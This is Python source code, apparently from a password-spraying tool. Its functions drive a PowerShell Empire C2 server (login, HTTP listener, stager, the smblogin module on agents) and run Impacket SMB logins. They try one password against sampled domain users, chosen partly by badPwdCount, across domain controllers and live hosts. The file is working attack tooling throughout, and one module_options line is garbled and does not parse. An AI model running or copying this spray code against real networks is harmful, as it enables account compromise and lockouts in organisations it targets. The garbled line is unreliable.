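    def execute_module_with_results(self, module_name, agent_name, module_options=None, timeout=None):
        """Task an Empire module on an agent and block until its output arrives.

        Calls ``self.execute_module`` and, when the server reports success,
        polls ``self.get_agent_results`` every two seconds until an entry for
        the returned ``taskID`` looks finished.

        Args:
            module_name: Empire module path (e.g. ``'powershell/...'``).
            agent_name: Name of the agent the module is tasked to.
            module_options: Optional dict of module options, passed through
                unchanged to ``self.execute_module``.
            timeout: Optional number of seconds after which polling gives up
                and ``None`` is returned. ``None`` (the default) polls
                forever, which is what the previous implementation did.

        Returns:
            The ``results`` string of the matching task entry, or ``None`` when
            the module could not be tasked, the server reported ``success`` as
            ``False``, or (with ``timeout`` set) no finished entry showed up in
            time.
        """
        import time  # local import: the module-level import block is not visible here

        r = self.execute_module(module_name, agent_name, module_options)
        if not r:
            return None
        print_info("Msg: " + r['msg'])
        if r['success'] is False:
            return None

        print_info("Waiting for results...")
        deadline = None if timeout is None else time.monotonic() + timeout
        task_id = r['taskID']

        while True:
            for result in self.get_agent_results(agent_name)['results']:
                if not result:
                    continue
                for entry in result['AgentResults']:
                    if entry['taskID'] != task_id:
                        continue
                    output = entry['results']
                    # Empire has no uniform "finished" marker: most modules end
                    # their output with "... completed", while get_domain_sid
                    # only prints the SID itself, so it is recognised by prefix.
                    done = ' completed' in output
                    if module_name == 'powershell/management/get_domain_sid' and 'S-1-5-21' in output:
                        done = True
                    if done:
                        return output
            if deadline is not None and time.monotonic() >= deadline:
                # Unbounded polling used to hang the caller forever when a task
                # never produced a completion marker.
                print_info("Timed out waiting for results of task " + str(task_id))
                return None
            sleep(2)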
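    def __init__(self, host, port, username, password):
        """Connect to an Empire REST API server and set up a listener and stager.

        Args:
            host: Empire server hostname or IP address.
            port: Empire REST API port.
            username: API username, handed to ``self.login``.
            password: API password, handed to ``self.login``.

        Attributes:
            host, port, base_url: always set; ``base_url`` is ``https://host:port``.
            token: ``{'token': <value returned by self.login>}``; the value is
                ``None`` when login failed.
            listener, stager: filled from ``self.get_listener`` /
                ``self.generate_stager`` after a successful login, otherwise
                left as ``None`` (previously they were not set at all, so any
                later access raised AttributeError).
        """
        print_info("Connecting to Empire REST API Server on " + host + ":" + str(port) + "....")
        self.host = host
        self.port = port
        # NOTE(review): TLS certificate handling for this URL lives in the
        # request helpers (login/get_listener/...), not visible here — confirm.
        self.base_url = 'https://' + host + ':' + str(port)
        # Defaults first, so the attributes exist even when login fails.
        self.listener = None
        self.stager = None
        self.token = {'token': self.login(host, username, password)}
        if self.token['token'] is None:
            return
        print_status("Successfully connected to Empire server " + host)
        print_info("Starting Http Listener...")
        self.listener = self.get_listener()
        self.stager = self.generate_stager()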
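def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    """Try one password over several hosts, one SMB authentication per host.

    Picks up to ``nusers`` accounts (from ``get_users`` when ``UseDomainAct``
    is set, otherwise names from ``generate_random_users``) and up to
    ``nusers`` computers from ``get_computers``, keeps the live ones via
    ``get_live_hosts`` and calls ``smb_login`` once per (user, host) pair.

    Args:
        duser, dpass: Credentials for the LDAP lookups — not the sprayed password.
        domain, dc_ip: Domain name and DC address for the lookups.
        nusers: Sample size for both the user and the computer query.
        sleep: Seconds handed to ``smb_login`` as its pause between attempts.
        spraypassword: Password handed to ``smb_login``.
        UseDomainAct: Use domain accounts and pass ``domain`` to ``smb_login``;
            otherwise generated names with an empty domain.

    Returns:
        None. Progress and failures are reported through print_* helpers; the
        function returns early when a sample cannot be drawn.
    """
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except Exception:  # a bare except also swallowed KeyboardInterrupt/SystemExit
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...")

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except Exception:  # see above
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each authentication attempt...")

    # zip() stops at the shorter list, which replaces the old
    # users[:len(computers)] truncation plus computers[idx] indexing and can
    # no longer raise IndexError when the lists disagree in length.
    spray_domain = domain if UseDomainAct else ""
    for user, computer in zip(users, computers):
        smb_login(spray_domain, user, spraypassword, computer, sleep)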
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True):
    """Run the Empire smblogin module from one agent against one random host.

    Samples up to ``nusers`` computers with ``get_computers``, keeps the live
    ones (``get_live_hosts``), picks one at random and tasks
    ``powershell/situational_awareness/network/smblogin`` on ``agentid`` with
    a comma-joined username list and ``spraypassword``. The module output is
    handed to ``process_empire_results``.

    Args:
        empiresession: Object exposing ``execute_module_with_results``.
        agentid: Empire agent the module is tasked to.
        duser, dpass: Credentials for the LDAP lookups — not the sprayed password.
        domain, dc_ip: Domain name and DC address for the lookups.
        nusers: Sample size for both the user and the computer query.
        spraypassword: Passed to the module as its ``Password`` option.
        sleep: Passed to the module as its ``Sleep`` option (stringified).
        UseDomainAct: Use accounts from ``get_users`` and pass ``domain``;
            otherwise generated names with an empty ``Domain`` option.
        UseKerberos: Pass ``host[0]`` as ``ComputerName`` instead of
            ``host[1]`` (presumably name vs. address — confirm against
            ``get_computers``).

    Returns:
        None. Returns early, after a print_error, when a sample cannot be drawn.
    """
    ## Against one random host on the domain

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    # NOTE(review): a bare except also swallows KeyboardInterrupt/SystemExit;
    # narrow it (random.sample raises ValueError when the sample is too large).
    except:
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain,computers,dc_ip)

    # NOTE(review): random.choice raises IndexError when get_live_hosts
    # returned an empty list; there is no guard for that here.
    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " -  " + host[1])
    computername = host[0] if UseKerberos else host[1]

    if UseDomainAct:

        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        # NOTE(review): same bare-except concern as above.
        except:
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")

    else:

        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")

    usernames = []

    # Without UseDomainAct the generated ``users`` only fix the count: every
    # entry below is a fresh name from generate_random_users(10)[0].
    for user in users:

        usernames.append(user if UseDomainAct else generate_random_users(10)[0])

    usernames = ",".join(usernames)
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")


    # NOTE(review): the ``UserName`` literal on the next two lines looks
    # garbled or redacted ("******" followed by an unmatched quote) and does
    # not parse as shown; the trailing "\"" suggests the list was meant to be
    # wrapped in double quotes — confirm against the original source.
    module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword,
                      'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'',
                                                              'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)}

    results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
    print_status("Obtained results from the Powershell Empire agent")
    process_empire_results(results,host)
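def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ):
    """Try one password for a list of users against a single Domain Controller.

    Looks up the DCs with ``get_dcs``, keeps the live ones via
    ``get_live_hosts``, picks one at random and hands the whole user list to
    ``smb_login`` in one call.

    Args:
        duser, dpass: Credentials for the LDAP lookups — not the sprayed password.
        domain, dc_ip: Domain name and DC address for the lookups.
        nusers: Number of accounts to sample or generate.
        sleep: Seconds handed to ``smb_login`` as its pause between attempts.
        spraypassword: Password handed to ``smb_login``.
        UseDomainAct: Use accounts from ``get_users`` and pass ``domain`` to
            ``smb_login``; otherwise generated names with an empty domain.

    Returns:
        None. Returns early, after a print_error, when no live DC is found or
        the user sample cannot be drawn.
    """
    print_info("Querying for Domain Controllers...")
    dcs = get_dcs(duser, dpass, domain, dc_ip)
    dcs = get_live_hosts(domain, dcs, dc_ip)
    if not dcs:
        # random.choice on an empty list used to raise IndexError here.
        print_error("No live Domain Controller found")
        return

    dc = random.choice(dcs)
    print_status("Randomly picked DC : " + dc[0] + " -  " + dc[1])

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except Exception:  # a bare except also swallowed KeyboardInterrupt/SystemExit
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
        spray_domain = domain
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
        spray_domain = ""

    # Shared tail of both branches; message order is unchanged.
    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each authentication attempt...")
    smb_login(spray_domain, users, spraypassword, dc, sleep)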
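def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True):
    """Run the Empire smblogin module once per host, one user per host.

    Picks up to ``nusers`` accounts and up to ``nusers`` computers, keeps the
    live computers via ``get_live_hosts`` and, for each (user, host) pair,
    tasks ``powershell/situational_awareness/network/smblogin`` on ``agentid``
    through ``empiresession.execute_module_with_results``. Pacing is done here
    with ``time.sleep`` rather than by the module (its ``Sleep`` option is
    always ``'0'``).

    Args:
        empiresession: Object exposing ``execute_module_with_results``.
        agentid: Empire agent the module is tasked to.
        duser, dpass: Credentials for the LDAP lookups — not the sprayed password.
        domain, dc_ip: Domain name and DC address for the lookups.
        nusers: Sample size for both the user and the computer query.
        spraypassowrd: Password passed as the module's ``Password`` option.
            (The misspelt name is kept so keyword callers keep working.)
        sleep: Seconds to pause after each module execution.
        UseDomainAct: Use accounts from ``get_users`` and pass ``domain``;
            otherwise a fresh generated name per host with an empty ``Domain``.
        UseKerberos: Pass ``host[0]`` as ``ComputerName`` instead of
            ``host[1]`` (presumably name vs. address — confirm against
            ``get_computers``).

    Returns:
        None. Returns early, after a print_error, when a sample cannot be drawn.
    """
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except Exception:  # a bare except also swallowed KeyboardInterrupt/SystemExit
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except Exception:  # see above
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")

    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")
    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each empire module execution...")

    # zip() stops at the shorter list, replacing users[:len(computers)] plus
    # computers[idx] indexing.
    for user, host in zip(users, computers):
        # Use a fresh local instead of rebinding the ``duser`` parameter,
        # which is the LDAP lookup account, not the account being tried.
        spray_user = user if UseDomainAct else generate_random_users(1)[0]
        computername = host[0] if UseKerberos else host[1]
        module_options = {
            'UserName': spray_user,
            'ComputerName': computername,
            'Password': spraypassowrd,
            'Domain': domain if UseDomainAct else '',
            'Sleep': '0',  # pacing happens below, not inside the module
        }

        results = empiresession.execute_module_with_results(
            "powershell/situational_awareness/network/smblogin", agentid, module_options)
        print_status("Obtained results from the Powershell Empire agent")
        process_empire_results(results, host)
        if sleep > 0:
            time.sleep(sleep)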
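def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword,  UseDomainAct=True):
    """Try one password for a list of users against a single random host.

    Samples up to ``nusers`` computers with ``get_computers``, keeps the live
    ones via ``get_live_hosts``, picks one at random and hands the whole user
    list to ``smb_login`` in one call.

    Args:
        duser, dpass: Credentials for the LDAP lookups — not the sprayed password.
        domain, dc_ip: Domain name and DC address for the lookups.
        nusers: Sample size for both the user and the computer query.
        sleep: Seconds handed to ``smb_login`` as its pause between attempts.
        spraypassword: Password handed to ``smb_login``.
        UseDomainAct: Use accounts from ``get_users`` and pass ``domain`` to
            ``smb_login``; otherwise generated names with an empty domain.

    Returns:
        None. Returns early, after a print_error, when a sample cannot be drawn
        or no live host remains.
    """
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except Exception:  # a bare except also swallowed KeyboardInterrupt/SystemExit
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    if not computers:
        # random.choice on an empty list used to raise IndexError here.
        print_error("No live domain computer found")
        return

    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " -  " + host[1])

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except Exception:  # see above
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
        spray_domain = domain
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
        spray_domain = ""

    # Shared tail of both branches; message order is unchanged.
    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each authentication attempt...")
    smb_login(spray_domain, users, spraypassword, host, sleep)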